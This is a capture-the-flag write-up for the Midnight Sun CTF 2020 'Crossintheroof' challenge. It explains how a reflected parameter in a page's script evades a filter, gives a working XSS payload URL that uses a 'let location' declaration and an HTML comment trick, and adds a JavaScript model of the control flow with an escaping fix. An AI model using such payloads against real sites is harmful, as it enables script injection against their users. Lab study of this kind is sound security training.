Thanks to the Midnight Sun CTF team for this amazing CTF, and also for
providing the payload for this challenge; without it this writeup would not
have been possible.

### Code: http://crossintheroof-01.play.midnightsunctf.se:3000/?source

```php

<script>  
setTimeout(function(){  
try{  
return location = '/?i_said_no_xss_4_u_:)';  
nodice=;  
}catch(err){  
return location = '/?error='+;  
}  
},500);  
</script>  
<script>  
/*  
payload:

*/  
</script>  
<body onload='location="/?no_xss_4_u_:)"'>hi. bye.</body>  
```

# Explanation: #

## Part 1  
The first part of the code above is PHP that checks which parameter was passed
and loads the page accordingly.

For example, this source-code page is reached by passing the `source` parameter:

(http://crossintheroof-01.play.midnightsunctf.se:3000/?source)

It also removes harmful characters.

When the `xss` parameter is passed, it skips the page-loading portion, so this
part of the code is of no use to us, because we are going to use the `xss`
parameter.

## Part 2:  
In the code above, the `xss` payload is reflected in three places: the try
block (after `nodice=`), the catch block (after `'/?error='+`) and the comment
section (after `payload:`).

Let `?xss=alert(1)`.

Then the try block never executes this code because of the `return` before it,
the catch block is not called because no error occurs, and the comment is just
a comment, so there is no XSS.

### Payload:

http://crossintheroof-01.play.midnightsunctf.se:3000/?xss=alert(1);let%20location=1;%0a%3C!--%3Cscript

#### Decoded:

```
http://crossintheroof-01.play.midnightsunctf.se:3000/?xss=alert(1);let location=1;
<!--<script
```
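The control flow described in Part 2, modelled as an added example (not the challenge's code or the original author's): the callback body is rebuilt as a plain function and run with a plain `alert(1)`, with the `alert(1);let location=1;` part of the payload, and with the same input emitted as a string literal. Assumptions: `buildBody`, `run` and `asJsString` are hypothetical names, `alert` is a recording stub, `location` is an ordinary function parameter rather than the browser object, and the `<!--<script` tail of the payload is not modelled.

```javascript
// Added example: the page's timer callback modelled as a plain function.
// `alert` is a recording stub and `location` an ordinary parameter.

// Reflect a value where the listing shows `nodice=;` and `'/?error='+;`.
function buildBody(reflected) {
  return [
    "try {",
    "  return location = '/?i_said_no_xss_4_u_:)';",
    "  nodice=" + reflected + ";",
    "} catch (err) {",
    "  return location = '/?error='+" + reflected + ";",
    "}",
  ].join("\n");
}

// Hypothetical hardening: emit the value as a JS string literal, with `<`
// escaped so the literal cannot open a comment or tag in the HTML parser.
function asJsString(value) {
  return JSON.stringify(String(value)).replace(/</g, "\\u003c");
}

// Run the body and report stub calls, the return value and any exception.
function run(reflected) {
  const calls = [];
  const alertStub = (v) => { calls.push(v); };
  let result = null;
  let threw = null;
  try {
    const fn = new Function("alert", "location", buildBody(reflected));
    result = fn(alertStub, "");
  } catch (e) {
    threw = e.name;
  }
  return { calls, result, threw };
}

// 1. Plain call: the `return` makes it dead code, the catch never runs.
const plain = run("alert(1)");
// 2. Page's payload prefix: the block-scoped `let location` puts `location`
//    in its temporal dead zone, so the first assignment throws and the
//    catch block evaluates the reflected expression before throwing again.
const declared = run("alert(1);let location=1;");
// 3. Same input through asJsString: it is data, the redirect happens.
const hardened = run(asJsString("alert(1);let location=1;"));

console.log({ plain, declared, hardened });
```
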

Original writeup (https://github.com/hrca-writeups/CTF-Writeups/blob/master/2020/Midnight%20Sun%20CTF%202020%20Quals/Crossintheroof.md).